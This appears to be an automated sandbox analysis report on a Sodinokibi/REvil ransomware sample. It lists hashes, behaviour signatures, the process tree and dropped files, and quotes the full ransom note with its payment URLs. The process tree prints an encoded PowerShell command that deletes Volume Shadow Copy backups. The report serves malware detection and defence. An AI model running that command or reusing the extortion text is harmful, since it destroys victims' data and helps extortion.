Overview

overview

10

Static

static

10

9efbbace68...18.exe

windows7-x64

10

9efbbace68...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/06/2024, 17:29

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    9efbbace685671cc174a24989e4dda08

  • SHA1

    9234b5bd774ca12b0fe46ce74c80f1ea76d85600

  • SHA256

    65980c4eba464e9bdaa06ac6bad34b90405c591769accb078ac352288be9def5

  • SHA512

    a2af96b0e6557c1f4bb4900f5abb0d39594847521156d37c33c7f3c744475bf8e91a8f14e0910e6c4f192da9aa25e40acd691b7efe841adcf95ac8670b140133

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3Qlz:ZJ0BXScFy2RsQJ8zglz

Score
10/10
sodinokibipersistenceransomware

Malware Config

Extracted

Path

C:\Recovery\1j6zsdt5-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 1j6zsdt5. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C368F7263F3A6B03 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/C368F7263F3A6B03 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: V6YW3ISATgJbS1gMvLcJnmsf8frnG0m+nr3dvSDwoqnGL9tNjplyZj91hFw4Uref Rg2Tm6YiUCSBUUEKx7OhFrDchBgp65QSJnEqVHYDjL4/uv78kXeqVlCbSkrvVSLT CSLeQzxswISax/M5WAtaSCZji1guUedYYrlv4H++7JyIkz9cZEorXMlShsLgqrqQ 22eAKCqNHL32nLOKyw0ny7/taPYEQ012heOhc5akgZSlz3pPMgCbM/HjXpkAM+km Wp92RD39HIfv1pmWNFilHoHGF/YA5JtDK5s36+FMJqHScc93qJEWd7B75bRale8/ cvIzyYllM9+C/Hc6y5HHs7Fmj7PIIeAg1OTGf1N+h8DlHkBg+eI8hSt2Q229azgx se8Lpnro9GihM59mlT6fnzfmPCq+j4woWfK2z7G9C6f7fYPxvD9FDQudu1WwWBwO 6UDntuVvPnJbMrHt1JFVDxDAw12NntlyyEKOXOhql4KmCe+kytlD4S63ZhdwTsyv 9jxG3PhC5N4XZApDLxyi2Y8WsnqEMDTOrYhliHDvzvaNXElmwJrHCkna0H7t2bJr zopF3N+jdxO704JrfmXbrJrPRRPCUc5KV9JGoNj/emMBFovC8Kuzgs5UWXNJihiL CEaTBJ763Vw0yG0cETsKbpZMQJwrGAdzUvBEiGdxLeuyd+HHUKRC3AZ9xT8669EU NDLdcbMOcYpdXafA7/yNZag3b1GyN3WykbNGX+6rrFEvYGOXUKKYtbS8+SJmiymj zeT8OpAexJ1g+TEaWCYmDvbNDoHNm/bl7RM6Eenv/HEZyJ2rBgEm3Txk++Na3lCF HqToSN2NZeLeoF08Dbt+wukllWwPvpJOJJRWPA85fm6PUGLawJZ6eBOv8hV6mh53 yyxVZ/2Osq4m0aGn68F0xF801KLO5udD3qBnpaqc6L/4HkAixobhz+Ij50h+pIa0 N2V71aSXvjNibl3hflwLl6VWOv4juTERE4eAOxsGfq1FztbbvsNeMQ5+QpHA3uVG cnDLoBFqyJuw+O83vu7T3varXBSWCUI1flqefbDYx9xV4ewa1+sxPEXWPDALv0Vt lptKPwnyY+uct9rTVWgVDIp8KeZUEHjboQGjlsGtfciEgS8wWobvSpnoCV/UXfJW 0uWQsjGhmIweWuwVNNAbOXQd2Q/mBvzNbloFdhIjksRKa+IH07o/MdQo6DrziaJn InVLKomZ3Y13rNyjxxUgoJy7iLDZXx/pCYYq1tCvaSZgcmUngj7kNzpn1zQjkoQp lxGYNLclb7+E3EW4LkCVTqFS2xKvY6Fydvlhh2GfVxi9lCS/DFRkiQVc6dhViUCp L8Kn+L4wH0JzQ0HUhfeUOPrsdg9OdXocS/SjmX3AdgAmNATrYS38jPe0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C368F7263F3A6B03

http://decryptor.cc/C368F7263F3A6B03

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\9efbbace685671cc174a24989e4dda08_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3928
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:632
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4036 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:3440

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Recovery\1j6zsdt5-readme.txt
        Filesize

        6KB

        MD5

        960c4d938fb4b25d9943775b92baca6b

        SHA1

        f4e342d5822e528175039273532373bf23e2a5fa

        SHA256

        f10ae26f58b47709f2e949bac8316f35ec768219a0ec9f45689198b100af08d5

        SHA512

        57b2111a7f3471e51cf098d3612d0f125ee161f7b7f068c0efe13648295a842a92eefd58d25343dd48275304021d79480cedb0faa795772a128224ddf28e9cd5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vy5xtj5g.w2n.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/2836-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2836-10-0x00000176DC180000-0x00000176DC1A2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2836-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2836-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2836-15-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

        Filesize

        10.8MB

        Download